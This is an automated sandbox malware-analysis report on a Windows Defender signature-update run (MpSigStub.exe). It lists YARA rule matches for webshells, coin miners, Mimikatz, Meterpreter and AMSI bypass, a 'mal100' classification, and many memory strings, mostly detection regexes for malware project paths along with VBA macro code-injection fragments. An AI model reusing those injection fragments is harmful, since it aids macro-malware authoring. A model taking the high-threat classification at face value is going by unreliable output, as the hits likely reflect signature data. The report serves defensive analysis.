Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18290586958.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18350554191.00000138BE7D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18300875514.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18314653568.00000138BCAC3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000026.00000003.18305388995.00000138BD315000.00000004.00000001.sdmp, type: MEMORY	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18431448870.00000138BE186000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR	Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10

Jump to behavior

Source: MpAsDesc.dll.mui18.44.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: mpuxagent.dll.mui6.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui19.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui38.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui28.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui16.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui9.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui22.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui42.44.dr	Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui40.44.dr	Static PE information: No import functions for PE file found
Source: mpavbase.vdm.38.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui18.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui36.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui24.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.37.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui12.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui41.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui34.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui31.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui4.44.dr	Static PE information: No import functions for PE file found
Source: mpasdlta.vdm.37.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui29.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui8.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui8.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui14.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui17.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui17.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui37.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui8.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui10.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui20.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui10.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui10.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui20.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui7.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui33.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui2.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui16.44.dr	Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui1.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui9.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui15.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui39.44.dr	Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui0.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui32.44.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui7.44.dr	Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui27.44.dr	Static PE information: No import functions for PE file found
Source: mpasbase.vdm.38.dr	Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui0.44.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\wevtutil.exe

Process token adjusted: Security

Source: mpasdlta.vdm.37.dr	Static PE information: Section: .rsrc ZLIB complexity 0.998618847943
Source: mpavdlta.vdm.37.dr	Static PE information: Section: .rsrc ZLIB complexity 0.996141098485

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.mine.winVBS@21/230@1/2

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57E1AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError,

Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: ,AD:\baixa\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	Binary or memory string: dTP*\AD:\Master\ADWARA_NEW\idle_componet.vbpd
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: "\Mom\Knamemom.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: .+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: MyMoney.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: D:\\Wu Tong\\Softwares&Codes\\.*\\Locker\.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: \pekalongan.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: vD:\virustrojan\harpotinfeksiexe\harpotinfeksiexe\SERVER.VBP
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: ,'Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: \\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: R\baixando5link\baixando5link\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: X\D@nBtR270414\version final\DanBtR270414.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: .+\\L1Crpt_src\\ScantimeCrypter\\stub\\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: 2Daum Watch\HitControl.vbp
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	Binary or memory string: z1.vbp]
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: 0+.+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	Binary or memory string: .+:\\Intel\\Obfuscated Number-[0-9]{1,3}\\Obfuscated Nr-[0-9]{1,3}\\[a-zA-Z]{5,15}.vbp
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: 0.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: @*\AY:\zeus\downloadersource\My_Crypter_vbcrypter\vbcrypter\newStubMy\myprog.vbp
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: C:\\(DOCUME~1\|Documents and Settings)\\ben(~1\.BEN)?\\Desktop\\v58\\Win(-Spy)?\\(win\|wix\|WS86).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: .VBProjects
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: phapoeskeezm.vbp
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	Binary or memory string: *\AD:\Lap Trinh\Virus Mau\Pro 3\Pro3.vbp
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: 72E:\\kaynak( Kod\|~1)\\spynma(il_Merged\|~1).+?\.vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: @\Polifemo Ebrio Crypter\Stub.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+Hack\\.+\\inject\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: D:\\.{15}\\WEBPNT\\WebpNt\.vBp
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	Binary or memory string: 4Bomba logica\Proyecto1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: OJ.+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\.\\Desktop\\.\\Lite-Stub\\Obfuscated .\\..vbp
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: \RenoNevada\MainMango\Server.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .+:\\.NOVO.+\\BLINDADO\\PluginBrada..vbp
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: GB.+:\\.+\\NovissimoVBLoaderFILE.*\\NovissimoVBLoader\\Prg_Flex.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString]
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	Binary or memory string: '".+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: C:\Documents and Settings\Administrator\My Documents\winrar\server\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	Binary or memory string: (\server\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: PAJ:\MASTER\bb_soft\bb_promo\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: >\legal notice viri\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: bho\VBBHO.vbp
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: worm2007.vbp
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: 1ocuments and Settings\Usuario\1scritorio\Ex\Ex.vbp]
